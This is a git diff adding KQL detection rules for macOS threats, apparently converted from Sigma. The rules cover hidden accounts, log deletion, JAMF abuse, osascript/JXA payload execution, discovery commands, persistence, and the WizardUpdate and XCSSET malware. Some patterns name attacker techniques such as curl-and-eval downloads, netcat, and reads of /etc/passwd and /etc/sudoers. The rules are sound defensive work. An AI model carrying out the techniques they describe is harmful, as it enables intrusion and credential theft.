@@ -0,0 +1,12 @@ +// Title: Hidden User Creation +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-10 +// Level: medium +// Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "UniqueID" and ProcessCommandLine matches regex "([0-9]|[1-9][0-9]|[1-4][0-9]{2})")) or ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "IsHidden" and (ProcessCommandLine contains "true" or ProcessCommandLine contains "yes" or ProcessCommandLine contains "1"))) \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql b/KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql new file mode 100644 index 00000000..32f3bf54 --- /dev/null +++ b/KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql @@ -0,0 +1,12 @@ +// Title: Indicator Removal on Host - Clear Mac System Logs +// Author: remotephone, oscd.community +// Date: 2020-10-11 +// Level: medium +// Description: Detects deletion of local audit logs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and (ProcessCommandLine contains "/var/log" or (ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Logs/")) \ No newline at end of file 
diff --git a/KQL/rules/macos/process_creation/jamf_mdm_execution.kql b/KQL/rules/macos/process_creation/jamf_mdm_execution.kql new file mode 100644 index 00000000..d9a5780c --- /dev/null +++ b/KQL/rules/macos/process_creation/jamf_mdm_execution.kql @@ -0,0 +1,12 @@ +// Title: JAMF MDM Execution +// Author: Jay Pandit +// Date: 2023-08-22 +// Level: low +// Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate use of the JAMF CLI tool by IT support and administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains "createAccount" or ProcessCommandLine contains "manage" or ProcessCommandLine contains "removeFramework" or ProcessCommandLine contains "removeMdmProfile" or ProcessCommandLine contains "resetPassword" or ProcessCommandLine contains "setComputerName") and FolderPath endswith "/jamf" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql b/KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql new file mode 100644 index 00000000..9016c537 --- /dev/null +++ b/KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql 
@@ -0,0 +1,12 @@ +// Title: JAMF MDM Potential Suspicious Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-22 +// Level: medium +// Description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly + +DeviceProcessEvents +| where (FolderPath endswith "/bash" or FolderPath endswith "/sh") and InitiatingProcessFolderPath endswith "/jamf" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql b/KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql new file mode 100644 index 00000000..7db1cc23 --- /dev/null +++ b/KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql @@ -0,0 +1,10 @@ +// Title: JXA In-memory Execution Via OSAScript +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects possible malicious execution of JXA in-memory via OSAScript +// MITRE Tactic: Execution +// Tags: attack.t1059.002, attack.t1059.007, attack.execution + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -l " and ProcessCommandLine contains "JavaScript") or ProcessCommandLine contains ".js") and (ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "eval" and ProcessCommandLine contains "NSData.dataWithContentsOfURL") \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql b/KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql new file mode 100644 index 00000000..20fbc935 --- /dev/null +++ b/KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql 
@@ -0,0 +1,12 @@ +// Title: Launch Agent/Daemon Execution Via Launchctl +// Author: Pratinav Chandra +// Date: 2024-05-13 +// Level: medium +// Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1569.001, attack.t1543.001, attack.t1543.004 +// False Positives: +// - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious. + +DeviceProcessEvents +| where (ProcessCommandLine contains "submit" or ProcessCommandLine contains "load" or ProcessCommandLine contains "start") and FolderPath endswith "/launchctl" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/local_groups_discovery_macos.kql b/KQL/rules/macos/process_creation/local_groups_discovery_macos.kql new file mode 100644 index 00000000..22b775cc --- /dev/null +++ b/KQL/rules/macos/process_creation/local_groups_discovery_macos.kql @@ -0,0 +1,12 @@ +// Title: Local Groups Discovery - MacOs +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-10-11 +// Level: informational +// Description: Detects enumeration of local system groups +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "group") and FolderPath endswith "/dscacheutil") or (ProcessCommandLine contains "/etc/group" and FolderPath endswith "/cat") or ((ProcessCommandLine contains "-list" and ProcessCommandLine contains "/groups") and FolderPath endswith "/dscl") \ No newline at end of file 
diff --git a/KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql b/KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql new file mode 100644 index 00000000..f1d6c836 --- /dev/null +++ b/KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql @@ -0,0 +1,12 @@ +// Title: Local System Accounts Discovery - MacOs +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-08 +// Level: low +// Description: Detects enumeration of local systeam accounts on MacOS +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "list" and ProcessCommandLine contains "/users") and FolderPath endswith "/dscl") or ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "user") and FolderPath endswith "/dscacheutil") or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/sudoers") and FolderPath endswith "/cat") or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof") \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/macos_network_service_scanning.kql b/KQL/rules/macos/process_creation/macos_network_service_scanning.kql new file mode 100644 index 00000000..aa75713e --- /dev/null +++ b/KQL/rules/macos/process_creation/macos_network_service_scanning.kql 
@@ -0,0 +1,12 @@ +// Title: MacOS Network Service Scanning +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-21 +// Level: low +// Description: Detects enumeration of local or remote network services. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((FolderPath endswith "/nc" or FolderPath endswith "/netcat") and (not(ProcessCommandLine contains "l"))) or (FolderPath endswith "/nmap" or FolderPath endswith "/telnet") \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/macos_remote_system_discovery.kql b/KQL/rules/macos/process_creation/macos_remote_system_discovery.kql new file mode 100644 index 00000000..12724578 --- /dev/null +++ b/KQL/rules/macos/process_creation/macos_remote_system_discovery.kql 
@@ -0,0 +1,12 @@ +// Title: Macos Remote System Discovery +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-22 +// Level: informational +// Description: Detects the enumeration of other remote systems. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping") \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql b/KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql new file mode 100644 index 00000000..9a99227f --- /dev/null +++ b/KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql 
@@ -0,0 +1,12 @@ +// Title: MacOS Scripting Interpreter AppleScript +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-21 +// Level: medium +// Description: Detects execution of AppleScript of the macOS scripting language AppleScript. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002 +// False Positives: +// - Application installers might contain scripts as part of the installation process. + +DeviceProcessEvents +| where (ProcessCommandLine contains " -e " or ProcessCommandLine contains ".scpt" or ProcessCommandLine contains ".js") and FolderPath endswith "/osascript" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/network_sniffing_macos.kql b/KQL/rules/macos/process_creation/network_sniffing_macos.kql new file mode 100644 index 00000000..0bcd2c9c --- /dev/null +++ b/KQL/rules/macos/process_creation/network_sniffing_macos.kql @@ -0,0 +1,13 @@ +// Title: Network Sniffing - MacOs +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-14 +// Level: informational +// Description: Detects the usage of tooling to sniff network traffic. +// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/tcpdump" or FolderPath endswith "/tshark" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql new file mode 100644 index 00000000..44599194 --- /dev/null +++ b/KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql 
@@ -0,0 +1,13 @@ +// Title: New File Exclusion Added To Time Machine Via Tmutil - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-29 +// Level: medium +// Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. +// An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents +| where ProcessCommandLine contains "addexclusion" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil") \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql b/KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql new file mode 100644 index 00000000..1c14712e --- /dev/null +++ b/KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql @@ -0,0 +1,10 @@ +// Title: Osacompile Execution By Potentially Suspicious Applet/Osascript +// Author: Sohan G (D4rkCiph3r), Red Canary (Idea) +// Date: 2023-04-03 +// Level: medium +// Description: Detects potential suspicious applet or osascript executing "osacompile". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002 + +DeviceProcessEvents +| where ProcessCommandLine contains "osacompile" and (InitiatingProcessFolderPath endswith "/applet" or InitiatingProcessFolderPath endswith "/osascript") \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/osacompile_run_only_execution.kql b/KQL/rules/macos/process_creation/osacompile_run_only_execution.kql new file mode 100644 index 00000000..1e7dd6f2 --- /dev/null +++ b/KQL/rules/macos/process_creation/osacompile_run_only_execution.kql 
@@ -0,0 +1,10 @@ +// Title: OSACompile Run-Only Execution +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects potential suspicious run-only executions compiled using OSACompile +// MITRE Tactic: Execution +// Tags: attack.t1059.002, attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains " -x " and ProcessCommandLine contains " -e " \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql b/KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql new file mode 100644 index 00000000..b3683b8c --- /dev/null +++ b/KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql @@ -0,0 +1,10 @@ +// Title: Payload Decoded and Decrypted via Built-in Utilities +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: medium +// Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. +// MITRE Tactic: Execution +// Tags: attack.t1059, attack.t1204, attack.execution, attack.t1140, attack.defense-evasion, attack.s0482, attack.s0402 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/Volumes/" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "-base64" and ProcessCommandLine contains " -d ") and FolderPath endswith "/openssl" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql b/KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql new file mode 100644 index 00000000..2dc301ff 
--- /dev/null +++ b/KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql @@ -0,0 +1,10 @@ +// Title: Potential Base64 Decoded From Images +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-20 +// Level: high +// Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 + +DeviceProcessEvents +| where (ProcessCommandLine contains "base64" and ProcessCommandLine contains "-d" and ProcessCommandLine contains ">") and (ProcessCommandLine contains ".avif" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jfif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".pjp" or ProcessCommandLine contains ".pjpeg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".webp") and FolderPath endswith "/bash" and (ProcessCommandLine contains "tail" and ProcessCommandLine contains "-c") \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql b/KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql new file mode 100644 index 00000000..79eb20d4 --- /dev/null +++ b/KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql 
@@ -0,0 +1,10 @@ +// Title: Potential Discovery Activity Using Find - MacOS +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: medium +// Description: Detects usage of "find" binary in a suspicious manner to perform discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql b/KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql new file mode 100644 index 00000000..50020784 --- /dev/null +++ b/KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql @@ -0,0 +1,10 @@ +// Title: Potential In-Memory Download And Compile Of Payloads +// Author: Sohan G (D4rkCiph3r), Red Canary (idea) +// Date: 2023-08-22 +// Level: medium +// Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1059.007, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains "curl" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql b/KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql new file mode 100644 index 00000000..d1ccd685 --- /dev/null 
+++ b/KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via PlistBuddy +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-02-18 +// Level: high +// Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.001, attack.t1543.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "LaunchAgents" or ProcessCommandLine contains "LaunchDaemons") and (ProcessCommandLine contains "RunAtLoad" and ProcessCommandLine contains "true") and FolderPath endswith "/PlistBuddy" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql b/KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql new file mode 100644 index 00000000..4f983d37 --- /dev/null +++ b/KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql @@ -0,0 +1,10 @@ +// Title: Potential WizardUpdate Malware Infection +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: high +// Description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceProcessEvents +| where ((ProcessCommandLine contains "=$(curl " and ProcessCommandLine contains "eval") and FolderPath endswith "/sh") or (ProcessCommandLine contains "_intermediate_agent_" and FolderPath endswith "/curl") \ No newline at end of file 
diff --git a/KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql b/KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql new file mode 100644 index 00000000..4669dddd --- /dev/null +++ b/KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql @@ -0,0 +1,10 @@ +// Title: Potential XCSSET Malware Infection +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: medium +// Description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceProcessEvents +| where (((ProcessCommandLine contains "/sys/log.php" or ProcessCommandLine contains "/sys/prepod.php" or ProcessCommandLine contains "/sys/bin/Pods") and FolderPath endswith "/curl" and InitiatingProcessFolderPath endswith "/bash") and ProcessCommandLine contains "https://") or (((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/osacompile" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "LSUIElement" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/plutil" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "-r" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/zip")) \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql new file mode 100644 index 00000000..1235b69b --- /dev/null 
+++ b/KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql @@ -0,0 +1,14 @@ +// Title: Remote Access Tool - Potential MeshAgent Execution - MacOS +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: medium +// Description: Detects potential execution of MeshAgent which is a tool used for remote access. +// Historical data shows that threat actors rename MeshAgent binary to evade detection. +// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Environments that legitimately use MeshAgent + +DeviceProcessEvents +| where ProcessCommandLine contains "--meshServiceName" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql new file mode 100644 index 00000000..fcbfb0f9 --- /dev/null +++ b/KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql 
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - Renamed MeshAgent Execution - MacOS
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: high
+// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.
+// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
+// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not((FolderPath endswith "/meshagent" or FolderPath endswith "/meshagent_osx64")))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql
new file mode 100644
index 00000000..4064ad86
--- /dev/null
+++ b/KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Team Viewer Session Started On MacOS Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql b/KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql
new file mode 100644
index 00000000..d632a175
--- /dev/null
+++ b/KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql
@@ -0,0 +1,10 @@
+// Title: Root Account Enable Via Dsenableroot
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects attempts to enable the root account via "dsenableroot"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1078, attack.t1078.001, attack.t1078.003, attack.initial-access, attack.persistence
+
+DeviceProcessEvents
+| where FolderPath endswith "/dsenableroot" and (not(ProcessCommandLine contains " -d "))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql b/KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql
new file mode 100644
index 00000000..639e1618
--- /dev/null
+++ b/KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Cron Task/Job - MacOs
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/crontab"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/screen_capture_macos.kql b/KQL/rules/macos/process_creation/screen_capture_macos.kql
new file mode 100644
index 00000000..42dc015a
--- /dev/null
+++ b/KQL/rules/macos/process_creation/screen_capture_macos.kql
@@ -0,0 +1,12 @@
+// Title: Screen Capture - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Detects attempts to use screencapture to collect macOS screenshots
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate user activity taking screenshots
+
+DeviceProcessEvents
+| where FolderPath =~ "/usr/sbin/screencapture"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/security_software_discovery_macos.kql b/KQL/rules/macos/process_creation/security_software_discovery_macos.kql
new file mode 100644
index 00000000..31c19c30
--- /dev/null
+++ b/KQL/rules/macos/process_creation/security_software_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: Security Software Discovery - MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects usage of system utilities (only grep for now) to discover security software discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where FolderPath =~ "/usr/bin/grep" and ((ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "santad" or ProcessCommandLine contains "CbDefense" or ProcessCommandLine contains "falcond" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "BlockBlock" or ProcessCommandLine contains "LuLu") or (ProcessCommandLine contains "Little" and ProcessCommandLine contains "Snitch"))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/space_after_filename_macos.kql b/KQL/rules/macos/process_creation/space_after_filename_macos.kql
new file mode 100644
index 00000000..6dce835b
--- /dev/null
+++ b/KQL/rules/macos/process_creation/space_after_filename_macos.kql
@@ -0,0 +1,12 @@
+// Title: Space After Filename - macOS
+// Author: remotephone
+// Date: 2021-11-20
+// Level: low
+// Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.006
+// False Positives:
+// - Mistyped commands or legitimate binaries named to match the pattern
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith " " or FolderPath endswith " "
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/split_a_file_into_pieces.kql b/KQL/rules/macos/process_creation/split_a_file_into_pieces.kql
new file mode 100644
index 00000000..1a657308
--- /dev/null
+++ b/KQL/rules/macos/process_creation/split_a_file_into_pieces.kql
@@ -0,0 +1,12 @@
+// Title: Split A File Into Pieces
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-15
+// Level: low
+// Description: Detection use of the command "split" to split files into parts and possible transfer.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1030
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "/split"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql b/KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql
new file mode 100644
index 00000000..384b570f
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Browser Child Process - MacOS
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-04-05
+// Level: medium
+// Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1189, attack.t1203, attack.t1059
+// False Positives:
+// - Legitimate browser install, update and recovery scripts
+
+DeviceProcessEvents
